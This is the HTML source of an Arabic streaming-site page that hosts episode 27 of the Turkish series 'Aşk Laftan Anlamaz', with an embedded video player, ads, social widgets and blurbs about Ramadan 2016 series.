<!DOCTYPE html>
<html>
<head>
<title>الحب لا يفهم الكلام الحلقة 27 كاملة مترجمة HD اونلاين 2016 مشاهدة اونلاين</title>
<meta name="description" content="مشاهدة اونلاين الحب لا يفهم الكلام الحلقة 27 الحب لا يفهم الكلام Aşk Laftan Anlamaz مسلسل تركي مترجم للعربية HD اونلاين 2016" />
<meta name="keywords" content="فيديوهات مضحكة,افلام مضحكة,فيديوهات طريفة,ضحك في ضحك,أتحداك إذا بتلاقي انذل منها,هند,فيلم هندي" />
<meta name="robots" content="index,follow" />
<meta name="rating" content="general" />
<meta name="author" content="تلفزيون العرب" />
<meta name="copyright" content="تلفزيون العرب" />
<meta name="category" content="" />
<meta name="published" content="2017-01-22 17:42:54" />
<meta itemprop="name" content="الحب لا يفهم الكلام الحلقة 27 كاملة مترجمة HD اونلاين 2016" />
<meta itemprop="description" content="الحب لا يفهم الكلام Aşk Laftan Anlamaz مسلسل تركي مترجم للعربية HD اونلاين 2016" />
<meta itemprop="image" content="http://images.alarab.com/data/tv/20170122124042.jpg" />

<meta itemprop="url" content="http://tv1.alarab.com/v84827-_الحب_لا_يفهم_الكلام_Aşk_272016" />

<meta http-equiv="cache-control" content="public" />
<meta property="fb:app_id" content="100004923462328" />
<meta property="og:title" content="الحب لا يفهم الكلام الحلقة 27 كاملة مترجمة HD اونلاين 2016" />
<meta property="og:image" content="http://images.alarab.com/data/tv/20170122124042.jpg" /> 
<meta property="og:url" content="http://tv1.alarab.com/v84827-_الحب_لا_يفهم_الكلام_Aşk_272016" />
<meta property="og:type" content="movie" />
<meta property="og:site_name" content="تلفزيون العرب" />
<meta property="og:description" content="" />
<link rel="image_src" href="http://images.alarab.com/data/tv/20170122124042.jpg" />
<link rel="canonical" href="http://tv1.alarab.com/v84827-_الحب_لا_يفهم_الكلام_Aşk_272016" />
<link rel="alternate" type="application/rss+xml" href="/rss.xml" title="RSS feed for Tv alarab" />
<link href="/img/favicon.ico" rel="icon" type="image/ico" />
<script type="text/javascript" src="/js/ajax_likes.js"></script>



<meta name="viewport" content="width=device-width, user-scalable=no" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="msvalidate.01" content="CE6E4A0D572E9663738C032D8EAC2D37" />
<meta name="google-site-verification" content="Fs-1FdgzZDcN0esGmtHamII7vwUQ6jZ_7fGKqSTTV_8" />
<meta http-equiv="Cache-control" content="public">
<link rel="stylesheet" type="text/css" href="/css/style.css" />
<link rel="stylesheet" type="text/css" media="only screen and (max-device-width: 480px)" href="/css/mobile320.css?i=tb" />

<!--[if IE]>
        <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
</head>

<body>
 <div id="left-menu">
        
            <div class="search">
              <form>
                <input value="" placeholder="Search..." />
              </form>
            </div>
            
            <div class="wrapmenu">
              
              
              <h3>موقع العرب</h3>
              
              <ul class="menu accounts">
                <li><a href="/"><span>مشاهدة اونلاين</span></a></li>
                <li><a href="http://tv1.alarab.com/view-8/%D9%85%D8%B3%D9%84%D8%B3%D9%84%D8%A7%D8%AA-%D8%B9%D8%B1%D8%A8%D9%8A%D8%A9-%D8%B1%D9%85%D8%B6%D8%A7%D9%86-2016"><span>مسلسلات رمضان 2016</span></a></li>
				
<li><a title="" href="/ramadan2016/مغربية "   >مسلسلات رمضان المغربية </a></li>
<li><a title="" href="/ramadan2016/سورية"   >مسلسلات رمضان السورية</a></li>
<li><a title="" href="/ramadan2016/مصرية"   >مسلسلات رمضان المصرية</a></li>
<li><a title="" href="/ramadan2016/خليجية"   >مسلسلات رمضان الخليجية</a></li>
<li><a title="" href="/ramadan2016/لبانينة"   >مسلسلات رمضان اللبانينة</a></li>
<li><a title="" href="/ramadan2016/كويتية"   >مسلسلات رمضان الكويتية</a></li>
<li><a title="" href="/ramadan2016/سعودية"   >مسلسلات رمضان السعودية</a></li>
<li><a title="" href="/ramadan2016/اردنية"   >مسلسلات رمضان الاردنية</a></li>
<li><a title="" href="/ramadan2016/بحرينية"   >مسلسلات رمضان البحرينية</a></li>
<li><a title="" href="/ramadan2016/اماراتية"   >مسلسلات رمضان الاماراتية</a></li>
<li><a title="" href="/ramadan2016/قطرية"  >مسلسلات رمضان القطرية</a></li>
              </ul>
              
              <h3>قنوات فيديو:</h3>
              
              <ul class="menu">
                
									<li  id="d1"><a title="" href="/view-1/افلام-عربية" ><span>افلام عربية</span></a></li><li  id="d4"><a title="" href="/view-4/مسلسلات-كرتون" ><span>مسلسلات كرتون</span></a></li><li  id="d8"><a title="" href="/view-8/مسلسلات-عربية" ><span>مسلسلات عربية</span></a></li><li  id="d10"><a title="" href="/view-10/فيديو-كليب" ><span>فيديو كليب</span></a></li><li  id="d295"><a title="" href="/view-295/افلام-كرتون" ><span>افلام كرتون</span></a></li><li  id="d297"><a title="" href="/view-297/افلام-هندية" ><span>افلام هندية</span></a></li><li  id="d299"><a title="" href="/view-299/مسلسلات-تركية" ><span>مسلسلات تركية</span></a></li><li  id="d309"><a title="" href="/view-309/مقاطع-مضحكة" ><span>مقاطع مضحكة</span></a></li><li  id="d311"><a title="" href="/view-311/برامج-تلفزيون" ><span>برامج تلفزيون</span></a></li><li  id="d313"><a title="" href="/view-313/مسرحيات" ><span>مسرحيات</span></a></li><li  id="d1951"><a title="" href="/view-1951/مسلسلات-اجنبية" ><span>مسلسلات اجنبية</span></a></li><li  id="d5553"><a title="" href="/view-5553/افلام-اجنبية" ><span>افلام اجنبية</span></a></li><li  id="d5573"><a title="" href="/view-5573/ملخصات-المباريات" ><span>ملخصات المباريات</span></a></li><li  id="d5807"><a title="" href="/view-5807/تلفزيون-العرب" ><span>تلفزيون العرب</span></a></li><li  id="d6181"><a title="" href="/view-6181/افلام-مصرية-قديمة" ><span>افلام مصرية قديمة</span></a></li>	
              </ul>
              
          
              
        
              
            </div>
        
        </div>	
		



        
        <div id="content-wrapper">
        
            <!-- Header / start -->
            <header>
              
                <a href="#" id="menu" class="ico fl">menu</a>
                <a href="/" id="logo" ><img src="/images/logo.png" alt="صفحة البداية"/></a>
              
            </header><!--Header Section -->

<div id="FloatBanner" >
<a href="javascript: void(0)" onclick='$("#FloatBanner").hide();' style="float:left;width:100%;background:#ca2828;color:#FFF;display:inline-block;padding-top:3px;padding-bottom:3px;text-align:center;font-weight:bold;width:100px;float:left">
اغلاق
</a>
<div style="clear:both"></div>
<iframe style='float:left' src='http://www.alarab.com/banners/sideadvTMP.php' frameborder='0' scrolling='no' width='120' height='600'></iframe></div>



<div id="FloatBanner2">
<a href="javascript: void(0)" onclick='$("#FloatBanner2").hide();' style="float:right;width:100%;background:#ca2828;color:#FFF;display:inline-block;padding-top:3px;padding-bottom:3px;text-align:center;font-weight:bold;width:100px;">
اغلاق
</a>
<div style="clear:both"></div>

<iframe id='a027f5b8' name='a027f5b8' src='http://openx.alarab.com/www/delivery/afr.php?zoneid=102&amp;cb=INSERT_RANDOM_NUMBER_HERE' frameborder='0' scrolling='no' width='100' height='600'><a href='http://openx.alarab.com/www/delivery/ck.php?n=a491ac92&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://openx.alarab.com/www/delivery/avw.php?zoneid=102&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=a491ac92' border='0' alt='' /></a></iframe>

</div>


<link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">

<div class="over_head">
	<div class="item_wrap">
		<ul>
			<li><i class="fa fa-newspaper-o fa-lg"></i><a href="http://www.alarab.com/1/" title="اخبار محلية وعربية الناصرة " >أخبار</a></li>
			<li><i class="fa fa-futbol-o fa-lg"></i><a href="http://www.alarab.com/3/" title="كوورة" >رياضة</a></li>
			<li><i class="fa fa-futbol-o fa-lg"></i><a href="http://www.alarab.com/tag_search.php?tag=%D9%85%D8%A8%D8%A7%D8%B1%D8%A7%D8%A9&stags=" title="فيديو ملخصات مباريات" >ملخصات المباريات</a></li>
			<li><i class="fa fa-key fa-lg"></i><a href="http://abraj.alarab.com/" title="حظك اليوم والابراج" >حظك اليوم</a></li>
			<li><i class="fa fa-film fa-lg"></i><a href="http://tv1.alarab.com/view-299/%D9%85%D8%B3%D9%84%D8%B3%D9%84%D8%A7%D8%AA-%D8%AA%D8%B1%D9%83%D9%8A%D8%A9" title="مسلسلات تركية مترجمة مدبلجة" >مسلسلات تركية</a></li>
			<li><i class="fa fa-film fa-lg"></i><a href="http://tv1.alarab.com/view-1/%D8%A7%D9%81%D9%84%D8%A7%D9%85-%D8%B9%D8%B1%D8%A8%D9%8A%D8%A9" title="افلام مصرية جديدة 2016" >افلام مصرية</a></li>
			<li><i class="fa fa-film fa-lg"></i><a href="http://tv1.alarab.com/view-5553/%D8%A7%D9%81%D9%84%D8%A7%D9%85-%D8%A7%D8%AC%D9%86%D8%A8%D9%8A%D8%A9" title="افلام اجنبية مترجمة" >افلام اجنبية</a></li>
			<li><i class="fa fa-music fa-lg"></i><a href="http://mp31.alarab.com/" title="اغاني عربية mp3" >اغاني</a></li>
			<li><i class="fa fa-music fa-lg"></i><a href="http://mp31.alarab.com/singer-797-%D8%AC%D9%85%D9%8A%D8%B9_%D8%A7%D8%BA%D8%A7%D9%86%D9%8A_%D9%88%D8%A7%D9%84%D8%A8%D9%88%D9%85%D8%A7%D8%AA_%D8%A7%D8%BA%D8%A7%D9%86%D9%8A_%D8%A7%D8%B7%D9%81%D8%A7%D9%84_.html" title="اغاني الاطفال" >اغاني اطفال</a></li>
			<li><i class="fa fa-hand-peace-o fa-lg"></i><a href="http://www.alarab.com/4368/" title="اجمل 10 قوائم " >اجمل 10</a></li>
			<li><i class="fa fa-television fa-lg"></i><a href="http://tv1.alarab.com/q/%D9%85%D8%AA%D8%B1%D8%AC%D9%85" title="اجمل 10 قوائم " >مسلسلات تركية مترجمة</a></li>
		</ul>
	</div>
</div>


<div class="topads"><center><iframe id='ad7a03f2' name='ad7a03f2' allowtransparency='true' src='http://adv.alarab.com/tv1/banners/top.php?height=95' frameborder='0' scrolling='no' width='800' height='90'></iframe></center></div>
 <!-- Begin BidVertiser code -->
<div id="outer_header">


<div id="header_sec">
<a href="/"><img src="data:image/png;base64,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" alt="" id="logo" width="137" height="50" /></a>
<div id="nav">
<ul id="navbar">
		<li  id="d5553"><a title=" أفلام أجنبي اون لاين مترجمة مشاهدة افلام اجنبية مباشرة مشاهدة" href="/view-5553/افلام-اجنبية" >افلام اجنبية</a></li><li  id="d1"><a title=" اكبر مكتبة عربية تضم باقة من اروع افلام البوكس اوفس" href="/view-1/افلام-عربية" >افلام عربية</a></li><li  id="d295"><a title=" مشاهدة وتحميل جميع افلام كرتون وافلام الأنمي كارتون أون لاين" href="/view-295/افلام-كرتون" >افلام كرتون</a></li><li  id="d6181"><a title=" افلام الزمن الاصيل الابيض والاسود افلام زمان" href="/view-6181/افلام-مصرية-قديمة" >افلام مصرية قديمة</a></li><li  id="d297"><a title=" افلام , افلام هندية , تحميل افلام هندية , افلام" href="/view-297/افلام-هندية" >افلام هندية</a></li><li  id="d311"><a title=" برامج تلفزيون منوعة، مشاهدة مباشرة، اونلاين على موقع العرب، تسجيلات" href="/view-311/برامج-تلفزيون" >برامج تلفزيون</a></li><li  id="d5807"><a title="" href="/view-5807/تلفزيون-العرب" >تلفزيون العرب</a></li><li  id="d10"><a title=" تحميل ومشاهدة كليبات فيديو كليب عربي اجنبيى اونلاين" href="/view-10/فيديو-كليب" >فيديو كليب</a></li><li  id="d313"><a title=" أشهر المسرحيات العربية لملوك المسرح دريد لحام، عادل أمام، فيروز،" href="/view-313/مسرحيات" >مسرحيات</a></li><li  id="d1951"><a title=" مسلسلات اجنبية ومكسيكية مترجمة ومدبلجة" href="/view-1951/مسلسلات-اجنبية" >مسلسلات اجنبية</a></li><li  id="d299"><a title=" مكتبة مسلسلات جديدة ومتنوعة للمسللات التركية بمشاهدة مباشرة و تحميل" href="/view-299/مسلسلات-تركية" >مسلسلات تركية</a></li><li  id="d8"><a title=" لنهائية لمسلسلات رمضان 2016 وقنوات عرض المسلسلات
راس الغول محمود عبدالعزيز" href="/view-8/مسلسلات-عربية" >مسلسلات رمضان 2016</a></li><li  id="d4"><a title=" مكتبة باقوى مسلسلات الكارتون، الرسوم المتحركة اونلاين، تحميل ومشاهدة مباشرة" href="/view-4/مسلسلات-كرتون" >مسلسلات كرتون</a></li><li  id="d309"><a title=" قسم متخصص في المقاطع المظحكه مقاطع فكاهيه رائعه فديو مضحك" href="/view-309/مقاطع-مضحكة" >مقاطع مضحكة</a></li><li  id="d5573"><a title=" ريـال مدريد برشلونه الزمالك والاهلي ملخصات المباريات" href="/view-5573/ملخصات-المباريات" >ملخصات المباريات</a></li>		
</ul>

</div>
<!--
<div class="signin">
<ul>

<li class="upload_btn"><a href="#">ارفع فيديو جديد</a></li>
</ul>
</div>
-->
<br class="clear" />
</div>
</div>
<!--Header Section  End-->

<!--Content Section -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
      <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->
<div id="content_sec">

<div class="trending_now">
	<img width="117" height="18" src="/images/trending_now.png" alt="الاضافات المتميزة" />
<div style="border-right:none"><a href="/series-6434_حب-للأيجار-مدبلج" title="kiralik ask - حب للأيجار مدبلج">حب للأيجار مدبلج</a> </div><div ><a href="/series-6433_شيري-ستوديو" title="Sherry Studio - شيري ستوديو">شيري ستوديو</a> </div><div ><a href="/series-6432_لعبة-النبلاء" title="Tierra de reyes - لعبة النبلاء">لعبة النبلاء</a> </div><div ><a href="/series-6431_الأب-الروحي" title="The Godfather - الأب الروحي">الأب الروحي</a> </div><div ><a href="/series-6430_اختيار-اجباري" title="Ekhtear Egbary - اختيار اجباري">اختيار اجباري</a> </div><div ><a href="/series-6429_ولاد-تسعة" title="welad tesaa - ولاد تسعة">ولاد تسعة</a> </div><div ><a href="/series-6428_السلطانة-قسم-الجزء-2-مدبلج" title="muhteşem yüzyıl kösem 2 - السلطانة قسم الجزء 2 مدبلج">السلطانة قسم الجزء 2 مدبلج</a> </div><div ><a href="/series-6427_حتى-الممات" title="Ölene Kadar - حتى الممات">حتى الممات</a> </div><div ><a href="/series-6426_ايزابيل" title="Ezabel - ايزابيل">ايزابيل</a> </div><div ><a href="/series-6425_-الملحمة-الاخيرة" title="son destan -  الملحمة الاخيرة"> الملحمة الاخيرة</a> </div>	<div id="plusone">
		<g:plusone size="standard" href="http://tv1.alarab.com/v84827-_%D8%A7%D9%84%D8%AD%D8%A8_%D9%84%D8%A7_%D9%8A%D9%81%D9%87%D9%85_%D8%A7%D9%84%D9%83%D9%84%D8%A7%D9%85_A%C5%9Fk_272016"></g:plusone>
	</div>
	
	<div class="fb-like" style="border:none;margin:none;float:left;margin-top:2px;" data-href="http://tv1.alarab.com/v84827-_%D8%A7%D9%84%D8%AD%D8%A8_%D9%84%D8%A7_%D9%8A%D9%81%D9%87%D9%85_%D8%A7%D9%84%D9%83%D9%84%D8%A7%D9%85_A%C5%9Fk_272016" data-width="100px" data-layout="button_count" data-action="like" data-show-faces="false" data-share="true"></div>	
</div>

<a title="" href="/ramadan2016/مغربية " class="series-types"  >مسلسلات رمضان المغربية </a><a title="" href="/ramadan2016/سورية" class="series-types"  >مسلسلات رمضان السورية</a><a title="" href="/ramadan2016/مصرية" class="series-types"  >مسلسلات رمضان المصرية</a><a title="" href="/ramadan2016/خليجية" class="series-types"  >مسلسلات رمضان الخليجية</a><a title="" href="/ramadan2016/لبانينة" class="series-types"  >مسلسلات رمضان اللبانينة</a><a title="" href="/ramadan2016/كويتية" class="series-types"  >مسلسلات رمضان الكويتية</a><a title="" href="/ramadan2016/سعودية" class="series-types"  >مسلسلات رمضان السعودية</a><a title="" href="/ramadan2016/اردنية" class="series-types"  >مسلسلات رمضان الاردنية</a><a title="" href="/ramadan2016/بحرينية" class="series-types"  >مسلسلات رمضان البحرينية</a><a title="" href="/ramadan2016/اماراتية" class="series-types"  >مسلسلات رمضان الاماراتية</a><a title="" href="/ramadan2016/قطرية" class="series-types" style='margin-left:0' >مسلسلات رمضان القطرية</a>
<div id="celebs" class="ramadanseriesTOP">
<div class="title">مسلسلات يتم نشرها قبل الجميع:  </div>


<div class="more_cel">
	<img src="http://images.alarab.com/data/tv/146-100/20170122205126.jpg" alt="خمس بنات الحلقة 40" />
	<a href="/v84839-_خمس_بنات_مسلسل_درامي_كويتي_402017">خمس بنات الحلقة 40 </a>
	<a class='foreign_name'  href="/v84839-_خمس_بنات_مسلسل_درامي_كويتي_402017" >شاهد اون لاين</a>
</div>
<div class="more_cel">
	<img src="http://images.alarab.com/data/tv/146-100/20170122200838.jpg" alt="السبع بنات الحلقة 42" />
	<a href="/v84837-_السبع_بنات_مسلسل_دراما_مصري_422017">السبع بنات الحلقة 42 </a>
	<a class='foreign_name'  href="/v84837-_السبع_بنات_مسلسل_دراما_مصري_422017" >شاهد اون لاين</a>
</div>
<div class="more_cel">
	<img src="http://images.alarab.com/data/tv/146-100/20170119111734.jpg" alt="الاب الروحي الحلقة 5" />
	<a href="/v84829-_الاب_الروحي_The_Godfather_مسلسل_52017">الاب الروحي الحلقة 5 </a>
	<a class='foreign_name'  href="/v84829-_الاب_الروحي_The_Godfather_مسلسل_52017" >شاهد اون لاين</a>
</div>
<div class="more_cel">
	<img src="http://images.alarab.com/data/tv/146-100/20170121215345.jpg" alt="اختيار إجباري الحلقة 5" />
	<a href="/v84825-_اختيار_إجباري_مسلسل_تشويق_واثارة_52017">اختيار إجباري الحلقة 5 </a>
	<a class='foreign_name'  href="/v84825-_اختيار_إجباري_مسلسل_تشويق_واثارة_52017" >شاهد اون لاين</a>
</div>
<div class="more_cel">
	<img src="http://images.alarab.com/data/tv/146-100/20170121215047.jpg" alt="السبع بنات الحلقة 41" />
	<a href="/v84824-_السبع_بنات_مسلسل_دراما_مصري_412017">السبع بنات الحلقة 41 </a>
	<a class='foreign_name'  href="/v84824-_السبع_بنات_مسلسل_دراما_مصري_412017" >شاهد اون لاين</a>
</div>
<div class="more_cel">
	<img src="http://images.alarab.com/data/tv/146-100/20170121214627.jpg" alt="خمس بنات الحلقة 39" />
	<a href="/v84823-_خمس_بنات_مسلسل_درامي_كويتي_392017">خمس بنات الحلقة 39 </a>
	<a class='foreign_name'  href="/v84823-_خمس_بنات_مسلسل_درامي_كويتي_392017" >شاهد اون لاين</a>
</div>
<div class="more_cel">
	<img src="http://images.alarab.com/data/tv/146-100/20170121184644.jpg" alt="خمس بنات الحلقة 38" />
	<a href="/v84818-_خمس_بنات_مسلسل_درامي_كويتي_382017">خمس بنات الحلقة 38 </a>
	<a class='foreign_name'  href="/v84818-_خمس_بنات_مسلسل_درامي_كويتي_382017" >شاهد اون لاين</a>
</div>
<div class="more_cel">
	<img src="http://images.alarab.com/data/tv/146-100/20170121184536.jpg" alt="خمس بنات الحلقة 36" />
	<a href="/v84816-_خمس_بنات_مسلسل_درامي_كويتي_362017">خمس بنات الحلقة 36 </a>
	<a class='foreign_name'  href="/v84816-_خمس_بنات_مسلسل_درامي_كويتي_362017" >شاهد اون لاين</a>
</div>
</div>
<style>
.more_cel {
    display: inline-block;
    float: right;
    text-align: center;
    width: 120px;
	margin-bottom:15px;
}
.more_cel img {
    margin: 10px 10px 0;
    width: 100px;
}
.more_cel a {
    color: #be450b;
    text-align: center;
	font-size:  13px;
}
</style>
<div style="clear:both"></div>
<div id="left_content">
<div id="banner_slider">
<div id="title-video" itemscope itemtype="http://schema.org/VideoObject">
		<a href="https://www.facebook.com/sharer/sharer.php?u=http://tv1.alarab.com/v84827-_الحب_لا_يفهم_الكلام_Aşk_272016" class="share-btn55" target="_blank" style="float:right;">
		  <span class="share-btn-action share-btn-like">Like</span>
		  <span class="share-btn-count"></span>
		  
		</a>
<h1  itemprop="name" style="width:522px;">الحب لا يفهم الكلام الحلقة 27 كاملة مترجمة HD اونلاين 2016</h1>
<div class="urlpath" style="margin-top:8px">
<a href="http://tv1.alarab.com" title="مسلسلات رمضان 2016  | تركية | افلام عربي | هندي | اجنبية مشاهدة اونلاين alarab.net">صفحة البداية </a>

<a class="" href="/view-299/مسلسلات-تركية">مسلسلات تركية</a><a class="" href="/series-6339_الحب-لا-يفهم-الكلام-">الحب لا يفهم الكلام </a><a href="/v84816-_خمس_بنات_مسلسل_درامي_كويتي_362017" title="الحب لا يفهم الكلام الحلقة 27 كاملة مترجمة HD اونلاين 2016" style="background:none">الحب لا يفهم الكلام الحلقة 27 </a>	<!--<div class="video_skip">
	
	<img src="images/add.png" alt="" />
	<img src="images/pervios.png" alt="" />
	<img src="images/next.png" alt="" />
	</div>-->
</div>
</div>
<div class="video-slider">
<form method="post" class="light" style=" background: none repeat scroll 0 0 #FF3950 ;display: inline-block;margin: auto;width: 95%;">
    <input type="text" name="q" placeholder="ادخل اسم مسلسل \ فيلم او مقطع للبحث..." style="margin:5px;margin-left:0" value="ابحث عن مسلسل"/>
    <input type="submit" name="search" value="ابحث في الموقع" style="margin:5px;margin-right:0;"  />
</form>
<div style="clear:both"></div>			
			<div class="text_ads">
				<a href="/Article/"  class="ad_title"><img src="http://www.alarab.com/adp.png" style="margin-left:10px;"/></a>
				<span class="ad_desc"></span>
			</div>
<style>
.text_ads {
width:98%;
padding:5px;
border:1px #F6E19B solid;
display:inline-block;
margin-bottom:8px;
background:#FFF;
}
.ad_title {
font-family:"Droid Arabic Kufi",serif;
font-size:15px;
font-weight:bold;
display:inline-block;
width:100%;	
color:#006621;
text-decoration:none
}
.ad_desc {
font-family:arial;
font-size:11pt;
font-weight:bold;
display:inline-block;
width:100%;	
color:#595E6E
}

</style>	
<iframe style="background:#ca2828" src="http://alarabplayers.alarab.com/?vid=84827&height=457&autoplay=true&title=الحب لا يفهم الكلام الحلقة 27&noad=1&autoplay=false" itemprop="video" width="100%" height="477" scrolling="No" frameborder="0" id="placeholder" allowtransparency="true" scrollbars="no" transparent="yes" allowFullScreen></iframe><a href="/download.php?file=84827" target="_blank" onClick="_gaq.push(['_trackEvent', 'tv1', 'download', 'الحب لا يفهم الكلام الحلقة 27 كاملة مترجمة HD اونلاين 2016']);"><img src="/images/download.png" alt=""/></a>
  
<meta itemprop="duration" content="PT0M0S" />
<meta itemprop="isFamilyFriendly" content="True">
<meta itemprop="thumbnailUrl" content="http://images.alarab.com/data/tv/20170122124042.jpg" />
<meta itemprop="embedURL" content="http://alarabplayers.alarab.com/jwplayer/player.swf?file=http://flv2.alarab.com:8080/new/flv/108432.flv.flv&provider=lighttpd&image=http://images.alarab.com/data/tv/20170122124042.jpg" />  
<link itemprop="url" href="/v84816-_خمس_بنات_مسلسل_درامي_كويتي_362017">
<meta itemprop="rating" content="3.5" />
<meta itemprop="bestRating" content="4" />

<noframes>
<OBJECT  height="350" width="500" >
<PARAM NAME="movie" value="http://alarabplayers.alarab.com/jwplayer/player.swf?file=http://flv2.alarab.com:8080/new/flv/108432.flv.flv&provider=lighttpd&image=http://images.alarab.com/data/tv/20170122124042.jpg">
<param name="allowfullscreen" value="true">
<param name="allowscriptaccess" value="always">
<EMBED src="http://alarabplayers.alarab.com/jwplayer/player.swf?file=http://flv2.alarab.com:8080/new/flv/108432.flv.flv&provider=lighttpd&image=http://images.alarab.com/data/tv/20170122124042.jpg" allowfullscreen="true" allowscriptaccess="always"  height="350" width="500" NAME="objid5" type="application/x-shockwave-flash" ></EMBED>
</OBJECT>
</noframes>
</div>

<h2>
الحب لا يفهم الكلام Aşk Laftan Anlamaz مسلسل تركي مترجم للعربية HD اونلاين 2016</h2>
<h3 style="font-weight:normal;padding:5px;color:#000">
بطولة: ,  

</h3>
<div style="padding:8px;font-size:13px;" itemprop="description">
قصة مسلسل <i>الحب لا يفهم الكلام الحلقة 27</i>: </div>
</div>
<div class="panel-video">
<div class="panel-left">

  
        
        <div class="tab-tr" id="t1">
            <div class="like-btn ">Like</div>
            <div class="dislike-btn "></div>


            <div class="stat-cnt">
                <div class="rate-count">0</div>
                <div class="stat-bar">
                    <div class="bg-green" style="width:0%;"></div>
                    <div class="bg-red" style="width:0%"></div>
                </div><!-- stat-bar -->
                <div class="dislike-count">0</div>
                <div class="like-count">0</div>
            </div><!-- /stat-cnt -->
        </div><!-- /tab-tr -->
      


</div>
</div>


 

<script>
    $(function(){ 
        var pageID = 84827; 

        $('.like-btn').click(function(){
            $('.dislike-btn').removeClass('dislike-h');    
            $(this).addClass('like-h');
            $.ajax({
                type:"POST",
                url:"/ajax.php",
                data:'act=like&pageID='+pageID,
                success: function(){
                }
            });
        });
        $('.dislike-btn').click(function(){
            $('.like-btn').removeClass('like-h');
            $(this).addClass('dislike-h');
            $.ajax({
                type:"POST",
                url:"ajax.php",
                data:'act=dislike&pageID='+pageID,
                success: function(){
                }
            });
        });
        $('.share-btn').click(function(){
            $('.share-panel').toggle();
        });
    });
</script>	
<div class="share-panel" >
<em class="shout-out">&nbsp;</em>
<div class="embed-code"><textarea rows="" cols="">http://tv1.alarab.com/v84827-_%D8%A7%D9%84%D8%AD%D8%A8_%D9%84%D8%A7_%D9%8A%D9%81%D9%87%D9%85_%D8%A7%D9%84%D9%83%D9%84%D8%A7%D9%85_A%C5%9Fk_272016</textarea></div>
<div class="social-connect">
<div id="plusone">
		<g:plusone size="standard" href="http://tv1.alarab.com/v84827-_%D8%A7%D9%84%D8%AD%D8%A8_%D9%84%D8%A7_%D9%8A%D9%81%D9%87%D9%85_%D8%A7%D9%84%D9%83%D9%84%D8%A7%D9%85_A%C5%9Fk_272016"></g:plusone>
	</div>
	
	<div class="fb-like" style="border:none;margin:none;float:left;margin-top:2px;" data-href="http://tv1.alarab.com/v84827-_%D8%A7%D9%84%D8%AD%D8%A8_%D9%84%D8%A7_%D9%8A%D9%81%D9%87%D9%85_%D8%A7%D9%84%D9%83%D9%84%D8%A7%D9%85_A%C5%9Fk_272016" data-width="100px" data-layout="button_count" data-action="like" data-show-faces="false" data-share="true"></div>	
</div>

<div class="social-network-group">
<span class='st_googleplus_large' displayText='Google +'></span>
<span class='st_facebook_large' displayText='Facebook'></span>
<span class='st_twitter_large' displayText='Tweet'></span>
<span class='st_linkedin_large' displayText='LinkedIn'></span>
<span class='st_pinterest_large' displayText='Pinterest'></span>
<span class='st_email_large' displayText='Email'></span>
<span class='st_fblike_large' displayText='Facebook Like'></span>

</div>
</div>

<div class="video-info">
<div class="left-info-box">
<ul>
<li class="nobg">نشر في:  الأحد ٢٢ / يناير / ٢٠١٧</li>
<li>فئة: </li>
</ul>
</div>
<div class="right-info-box">
[[ <strong>0</strong> مشاهدات ]]
</div>
<p style="text-align: justify;">مسلسل <a href="http://tv1.alarab.com/series-6221_%D9%85%D8%A3%D9%85%D9%88%D9%86-%D9%88%D8%B4%D8%B1%D9%83%D8%A7%D9%87" target="_blank">مأمون وشركاه </a>، للمثل المصري الزعيم عادل امام الذي سيتم عرضه ضمن <a href="http://tv1.alarab.com/view-8/%D9%85%D8%B3%D9%84%D8%B3%D9%84%D8%A7%D8%AA-%D8%B9%D8%B1%D8%A8%D9%8A%D8%A9" target="_blank">مسلسلات رمضان 2016</a>بطولة: إنعام سالوسةتامر هجرسخالد سرحانعادل اماملبلبة 
تتمحور القصة حول الشخصية البخيلة "مأمون" وتبدأ الاحداث بالكشف عن علاقته الفاشلة مع ابنائه وازواجهن فبعد فترة قصيرة يبتعدون ابنائه عنه حتى يكتشفون انه ميليارديرا فتبدأ رحلة البحث عن امواله وكنزه في إطار الكوميديا الساخرة 
مأمون وشركاه 2016</p>
<br><br><br>
<p style="text-align: justify;">مسلسل <a href="http://tv1.alarab.com/series-6278_%D9%86%D9%8A%D9%84%D9%84%D9%8A-%D9%88%D8%B4%D8%B1%D9%8A%D9%87%D8%A7%D9%86" target="_blank">نيلي وشريهان</a>نيللي وشريهان مسلسل مصري كوميدي فكاهي HD رمضان 2016
بطولة: دنيا سمير غانم, إيمي سمير غانم, بيومي فؤاد, مصطفى خاطر, سلوى خطاب, محمد سلام</p>
<br><br><br>


<p style="text-align: justify;">أطلقت شركة الإنتاج للجزء السابع من المسلسل الشامي الشهير <a href="http://tv1.alarab.com/series-6229_%D8%A8%D8%A7%D8%A8-%D8%A7%D9%84%D8%AD%D8%A7%D8%B1%D8%A9-8">باب الحارة الجزء 8</a>تبدأ احداث جديدة من الموسم الثامن خلال فترة ثلاثينات القرن الماضي, ضمن إطار الدراما الأجتماعية وشخوصه, وتكشف الأحداث عن (حارة الضبع) وأهلها الأكثر انتفاحا عن الماضي, كما سيلقي المسلسل الضوء على التطور الاجتماعي للشام, ومن الناحية النسائية ايضا , نحو التعلم والمشاركة قضايا المجتمع..<br /></p>
<br>
<br>
</div>

<div id="comment-area">
<fb:comments xid="vd_84827" width="630"></fb:comments> 

 <div id="fb-root"></div> 

 <script> 
	  window.fbAsyncInit = function() {
		FB.init({appId: '140939665927610', status: true, cookie: true,
				 xfbml: true});
	  };
	  (function() {
		var e = document.createElement('script');
		e.type = 'text/javascript';
		e.src = document.location.protocol +
		  '//connect.facebook.net/ar_AR/all.js';
		e.async = true;
		document.getElementById('fb-root').appendChild(e);
	  }());
 
	</script> 

</div>

</div>
<!--<a href="http://adf.ly/19y1mc" target="_blank"><img src="/play.jpg" alt=""/></a>-->



<div id="right_content">
<div style="display:inline-block;float:right;">
<iframe src="http://www.facebook.com/plugins/likebox.php?href=https://www.facebook.com/ramadan.2016.mosalsalat&amp;width=300&amp;colorscheme=light&amp;show_faces=false&amp;border_color&amp;stream=false&amp;header=false&amp;height=82" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:82px;" allowTransparency="true"></iframe>

</div>
<div class="banner-right" >
